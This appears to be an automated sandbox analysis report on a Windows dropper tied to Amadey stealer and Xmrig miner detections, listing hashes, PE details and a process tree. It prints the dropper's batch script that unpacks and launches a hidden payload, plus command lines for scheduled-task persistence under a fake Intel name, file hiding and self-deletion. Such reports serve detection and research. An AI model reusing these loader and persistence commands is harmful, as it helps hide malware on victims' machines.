SSDEEP:	12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
MD5:	3626532127E3066DF98E34C3D56A1869
SHA1:	5FA7102F02615AFDE4EFD4ED091744E842C63F78
SHA-256:	2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
SHA-512:	DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
Malicious:	false
Preview:	..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\in.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1827328
Entropy (8bit):	7.963282633529333
Encrypted:	false
SSDEEP:	49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
MD5:	83D75087C9BF6E4F07C36E550731CCDE
SHA1:	D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
SHA-256:	46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
SHA-512:	044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..\|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:\|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.4367726114504857
Encrypted:	false
SSDEEP:	6:zFpmFbXUhXUEZ+lX1CGdKUe6tE9+AQy0l7Et0:xpmFr4Q1CGAFD9+nVgt0
MD5:	8AA6C5F2360E04EB0C4542A342E80BB6
SHA1:	28122382464ECBF8E3FEABE64E64180EB66B80D7
SHA-256:	B981131EEC09EAE7E008A59E163313D1D661BFD369F6ADB37A247E03EDB72A2C
SHA-512:	393C1950EFB47BEEE95751EC9B15A2FD389E4AD6BA98757E49D1D4D9A7A962C118A83A3B13D5C9CF9E745DB20F2D4654E4ABC4362F1DCD811BCFB39B4EF7CCC8
Malicious:	false
Preview:	.....a..t7H......c.F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	5.0682682106683945
Encrypted:	false
SSDEEP:	6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
MD5:	2F644B7E25627553C5731B735473C859
SHA1:	5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
SHA-256:	2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
SHA-512:	E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
Malicious:	false
Preview:	..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.5380962224606805
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'047'936 bytes
MD5:	99a7a8ab2463dd70f90e0ab4e0aec4a8
SHA1:	b9e2b99b7124d83df3b7cd052231cb35d1d6efcb
SHA256:	89601168c7196328f763faf4dd415b041c94f6d5fe5c2b7094d49dba69926a61
SHA512:	8e775104cc32b5426fbfe170632ca36949e66701a52b83fd8378b4eca239f928094dfca10ba9ae363c8aaad59f863260427fc5449ea7ca0e22ddda4256326e55
SSDEEP:	49152:rXbVHNeIAyjLGBiZQo42rhxAZimUH0wH6faFgmiCk/uIL:rzxXnGBiZQo42rhxAZi0wHymU
TLSH:	4EE56CA1F508B2CBD4AE53388C27DD8269AD07B90B1449D7F86C74BDBDA3DC522B5C24
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x723000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F69696A745Ah
punpcklbw mm5, qword ptr [esi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x5d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x321204	0x10	tddfmghq
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x3211b4	0x18	tddfmghq
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	a855eb9bd722d6ab63c99d8d3e495c57	False	0.9982171747275205	data	7.9825535221264685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x5d4	0x400	80286adc7a35e412b64ca61ad95ddc10	False	0.7060546875	data	5.82538346241216	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tddfmghq	0x6b000	0x2b7000	0x2b6800	be008f92acc7948aa1e9757b4e699563	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zxizpfjk	0x322000	0x1000	0x400	97a985ebfe75e2117b8c65dac92dfdfa	False	0.7724609375	data	6.056222168544577	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x323000	0x3000	0x2200	92841a4f36a77fc443aa0ef82f794a56	False	0.04354319852941176	DOS executable (COM)	0.43462386318593277	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x321214	0x3e4	XML 1.0 document, ASCII text			0.48092369477911645
RT_MANIFEST	0x3215f8	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	13:12:06
Start date:	20/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xb20000
File size:	3'047'936 bytes
MD5 hash:	99A7A8AB2463DD70F90E0AB4E0AEC4A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2221672468.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:12:10
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xf30000
File size:	3'047'936 bytes
MD5 hash:	99A7A8AB2463DD70F90E0AB4E0AEC4A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2262477071.0000000004960000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:12:11
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xf30000
File size:	3'047'936 bytes
MD5 hash:	99A7A8AB2463DD70F90E0AB4E0AEC4A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000004.00000003.2272594198.0000000005390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:13:00
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xf30000
File size:	3'047'936 bytes
MD5 hash:	99A7A8AB2463DD70F90E0AB4E0AEC4A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000003.2755017599.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	13:13:17
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe"
Imagebase:	0x400000
File size:	4'438'776 bytes
MD5 hash:	3A425626CBD40345F5B8DDDD6B2B9EFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 88%, ReversingLabs
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	13:13:21
Start date:	20/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Imagebase:	0x7ff6a01e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	13:13:22
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	13:13:22
Start date:	20/12/2024
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 65,10
Imagebase:	0x7ff78e670000
File size:	33'280 bytes
MD5 hash:	BEA7464830980BF7C0490307DB4FC875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:13:22
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Imagebase:	0x970000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:13:22
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_7.zip -oextracted
Imagebase:	0x970000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:13:22
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_6.zip -oextracted
Imagebase:	0x970000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:13:23
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_5.zip -oextracted
Imagebase:	0x970000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	13:13:23
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_4.zip -oextracted
Imagebase:	0x970000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	13:13:23
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_3.zip -oextracted
Imagebase:	0x970000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	13:13:23
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_2.zip -oextracted
Imagebase:	0x970000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	13:13:24
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_1.zip -oextracted
Imagebase:	0x970000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	13:13:24
Start date:	20/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H "in.exe"
Imagebase:	0x7ff64d350000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	13:13:24
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\in.exe
Wow64 process (32bit):	false
Commandline:	"in.exe"
Imagebase:	0x7ff6d4210000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	13:13:24
Start date:	20/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff64d350000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	13:13:25
Start date:	20/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff64d350000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	13:13:25
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	13:13:25
Start date:	20/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Imagebase:	0x7ff62d990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	13:13:25
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	13:13:25
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell ping 127.0.0.1; del in.exe
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	13:13:25
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	13:13:25
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	13:13:26
Start date:	20/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\PING.EXE" 127.0.0.1
Imagebase:	0x7ff72c040000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	13:13:27
Start date:	20/12/2024
Path:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff7fc490000
File size:	1'827'328 bytes
MD5 hash:	83D75087C9BF6E4F07C36E550731CCDE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 70%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	13:13:28
Start date:	20/12/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3026870349.0000000000847000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3026870349.000000000086B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3028044780.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000028.00000002.3026870349.0000000000895000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	13:13:28
Start date:	20/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
